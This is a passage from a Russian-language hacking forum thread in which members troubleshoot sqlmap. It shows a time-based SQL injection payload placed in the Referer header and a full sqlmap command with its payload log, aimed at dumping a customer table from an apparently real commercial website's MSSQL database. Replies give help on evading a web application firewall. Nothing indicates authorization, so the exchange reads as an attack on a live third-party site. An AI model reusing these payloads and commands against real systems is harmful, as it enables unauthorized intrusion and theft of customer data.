ANTICHAT — форум по информационной безопасности, OSINT и технологиям

/threads/469197/#post-4288885

Доброго времени суток. Получил такой результат со сканера:

This vulnerability affects /kontaktannonser/lista/.

HTTP Header input Referer was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(no w()=sysdate(),sleep(0),0))OR"*/GET

/kontaktannonser/lista/ HTTP/1.1

Referer: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(no w()=sysdate(),sleep(0),0))OR"*/

Как правильно составить запрос для Sqlmap?

тут надо самому сначала разбираться на что ваф срабатывает, а потом тампер писать, что в самом скульмапе, там типичные тамперы

Ребят кто как борится с got HTTP error code: 424 (HTTPError: Failed Dependency) ?

В чем может быть проблема, все норм извлекается, есть пустые значения, есть с записями.

Когда пытаюсь с командой "--where" отказывается извлекать. Пробовал другие значения

Что можно сделать?

./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C "Customer Group" --where "Customer Group IS NOT NULL" --dump --threads=10 -v 3

[21:11:39] [INFO] retrieved:

[21:11:39] [DEBUG] performed 3 queries in 1.12 seconds

[21:11:39] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically

[21:11:39] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>51) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END))

[21:11:39] [WARNING] time-based comparison requires larger statistical model, please wait........................... (done)

[21:11:50] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>48) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END))

[21:11:50] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[21:11:50] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>9) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END))

[21:11:51] [INFO] retrieved:

[21:11:51] [DEBUG] performed 3 queries in 11.51 seconds

[21:11:51] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'

[21:11:51] [WARNING] unable to retrieve the number of column(s) '[Customer Group]' entries for table 'sb_customersTB' in database 'SB'

[21:11:51] [INFO] fetched data logged to text files under '/root/.sqlmap/output/stickersbanners.com'
[*] ending @ 21:11:51 /2019-11-02/

943 пост в этой тебе （предыдущая страница）

Так в том то и дело, что когда используешь where, перестает извлекать. Без where, все подряд без проблем извлекается

еще такой вопрос, можно ли как то извлечь данные, по критерию: длинна содержимого колонки.

Допустим мне нужны все строки, где длинна определенной колонки не 7 символов?

А вы уверены что колонка у вас называется "Customer Group", а не "Customer_Group"? Если точно с пробелом, то попробуйте поставить имя колонки в одинарные кавычки: